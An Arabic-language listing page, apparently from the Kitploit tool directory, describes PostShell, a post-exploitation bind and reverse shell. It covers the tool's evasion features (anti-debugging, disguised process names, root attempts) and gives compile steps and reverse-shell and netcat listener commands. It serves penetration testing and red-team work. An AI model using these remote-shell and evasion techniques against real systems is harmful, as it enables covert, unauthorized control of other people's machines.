Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
postshell — PostShell - شل ربط/اتصال عكسي للاستغلال اللاحق | Kitploit
أدوات/GitHubGitHub/rek7/postshell
تصعيد الامتيازاتتوليد الحمولةآليات الاستمراريةشيل كودما بعد الاستغلالالقيادة والسيطرةالفريق الأحمرمكافحة الروبوتات
GitHubrek7/postshell

postshell

PostShell - شل ربط/اتصال عكسي للاستغلال اللاحق

عرض المستودع
8119منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PostShell

PostShell هي شيل استغلال لاحق يتضمن كلًا من شيل الربط وشيل الاتصال العكسي. تنشئ TTY تفاعلي بالكامل يسمح بالتحكم في الوظائف. حجم البرنامج الصغير حوالي 14 كيلوبايت ويمكن ترجمته على أي نظام يشبه يونكس.

لقطات الشاشة

Screenshot الشعار والتفاعل مع الشيل بعد بدء الاتصال.

لماذا لا تستخدم شيل اتصال عكسي/ربط تقليدي؟

PostShell تتيح استغلالًا لاحقًا أسهل من خلال جعل المهاجم أقل اعتمادًا على التبعيات مثل Python وPerl. كما تدمج كلًا من شيل الاتصال العكسي وشيل الربط، مما يعني أنه إذا كان الهدف لا يسمح بالاتصالات الصادرة، يمكن للمشغل ببساطة تشغيل شيل ربط والاتصال بالجهاز عن بُعد. كما أن PostShell أقل شكًا بشكل ملحوظ من الشيل التقليدي نظرًا لأن أسماء العمليات والوسائط مغطاة.

الميزات

  • مكافحة التصحيح، إذا تم اكتشاف ptrace مرتبطًا بالشيل فسيخرج.
  • أسماء العمليات/الخيوط مغطاة، يتم استبدال جميع وسائط النظام واسم الملف باسم مزيف ليجعله يبدو كبرنامج شرعي.
  • TTY، يتم إنشاء TTY يسمح بشكل أساسي بنفس استخدام الجهاز كما لو كنت متصلًا عبر SSH.
  • شيل ربط/اتصال عكسي، يمكن إنشاء كل من شيل الربط والاتصال العكسي.
  • حجم برنامج صغير، عادةً ما يتم إنشاء برنامج صغير جدًا (أقل من 14 كيلوبايت).
  • يتحول تلقائيًا إلى عملية خلفية.
  • يحاول تعيين GUID/UID إلى 0 (الجذر).

البدء

  1. التحميل: git clone https://github.com/rek7/postshell
  2. الترجمة: cd postshell && sh compile.sh يجب أن يؤدي ذلك إلى إنشاء ملف ثنائي يسمى "stub" وهو البرنامج الضار.

الأوامر

root@kitploit:~
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

مثال استخدام

اتصال عكسي:

root@kitploit:~
$ ./stub 127.0.0.1 13377

شيل ربط:

root@kitploit:~
$ ./stub 13377

استقبال اتصال باستخدام Netcat

استقبال اتصال عكسي:

root@kitploit:~
$ nc -vlp port

الاتصال بشيل ربط:

root@kitploit:~
$ nc host port

المهام المتبقية:

  • إضافة تحليل النطاق
تنزيل الأداة